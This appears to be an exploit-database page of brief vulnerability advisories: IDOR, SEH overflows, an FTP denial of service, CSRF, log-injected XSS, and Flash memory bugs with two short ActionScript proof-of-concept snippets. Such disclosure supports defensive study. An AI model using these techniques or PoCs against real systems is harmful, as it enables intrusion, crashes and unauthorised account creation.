An insecure direct object references occurd when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example databases or files. A remote attacker can inject own malicious code to delete a message in the application. The vulnerability is located in the `messageId` value of the `/main/messages/delete.php` POST request method.
STIMS Cutter application is vulnerable to SEH Overwrite vulnerability. The vulnerability can be triggered by making a cutt file and opening it in the STIMS Cutter application. When the user clicks on Build Report, the application crashes due to SEH Overwrite.
A buffer overflow vulnerability exists in STIMS Buffer version 1.1.20, which allows an attacker to overwrite the SEH pointer and execute arbitrary code. To exploit the vulnerability, an attacker must create a malicious buff file and open it in the STIMSBuffer application. When the View Report button is clicked, the SEH pointer is overwritten and arbitrary code can be executed.
This exploit is used to cause a denial of service attack on XM Easy Personal FTP Server 5.8.0. It sends a malicious HELP command with a buffer of 4500 A characters to the FTP server, causing it to crash.
DirectAdmin is a web-based hosting control panel. As seen in the code, the original form does not include CSRF protection or any secret token. An attacker can craft a malicious HTML page that contains a form with hidden fields that can be used to submit a request to the vulnerable application. This can be used to create a new user account with administrative privileges.
We can use user-agent information to attack website like this. First of all we change our user-agent and add some dangerous javascript code ( XSS etc. ) and then we request to one of the website on target server then it is saved on access.log by server so when Administrator reads it the javascript code works that we added our user-agent information.
A heap overflow vulnerability exists in Adobe Flash Player when processing MP4 files. An attacker can exploit this vulnerability to execute arbitrary code in the context of the current user.
A heap overflow vulnerability was discovered in the URLStream class due to an issue in ATF processing. The attached file causes a crash due to the vulnerability.
There is a use-after-free in LoadVars.decode. If a watch is set on the object that the parameters are being decoded into, and the watch deletes the object, then other methods are called on the deleted object after it is freed. A PoC is as follows: var lv = new LoadVars(); var f = lv.decode; var tf = this.createTextField('tf',1, 2, 3, 4, 5); tf.natalie = 'not test'; tf.watch('natalie', func); f.call(tf, 'natalie=test&bob=1'); trace(tf.natalie); function func(){ trace('here'); tf.removeTextField(); return 'test'; }
There is a dangling pointer that can be read, but not written to in loadPCMFromByteArray. A minimal PoC is as follows: var s = new Sound(); var b = new ByteArray(); for( var i = 0; i < 1600; i++){ b.writeByte(1); } b.position = 0; s.loadPCMFromByteArray(b, 100, "float", false, 2.0); var c = new ByteArray(); for(var i = 0; i < 2; i++){ c.writeByte(1); } c.position = 0; try{ s.loadPCMFromByteArray(c, 1, "float", false, 2.0); }catch(e:Error){ trace(e.message); } var d = new ByteArray(); s.extract(d, 1, 0); The PoC first loads PCM bytes correctly, setting an internal pointer to them. It then loads PCM bytes again, with a specific array length that passes the array length check, but then causes a exception to be thrown when reading the byte array. This causes the pointer to the original PCM array to be deleted, but then the function exits due to an exception before the pointer is set again. If the exception is caught, the sound object containing the dangling pointer can be used again. The sound.extract method reads directly out of the location the dangling pointer points to.
Services By CQR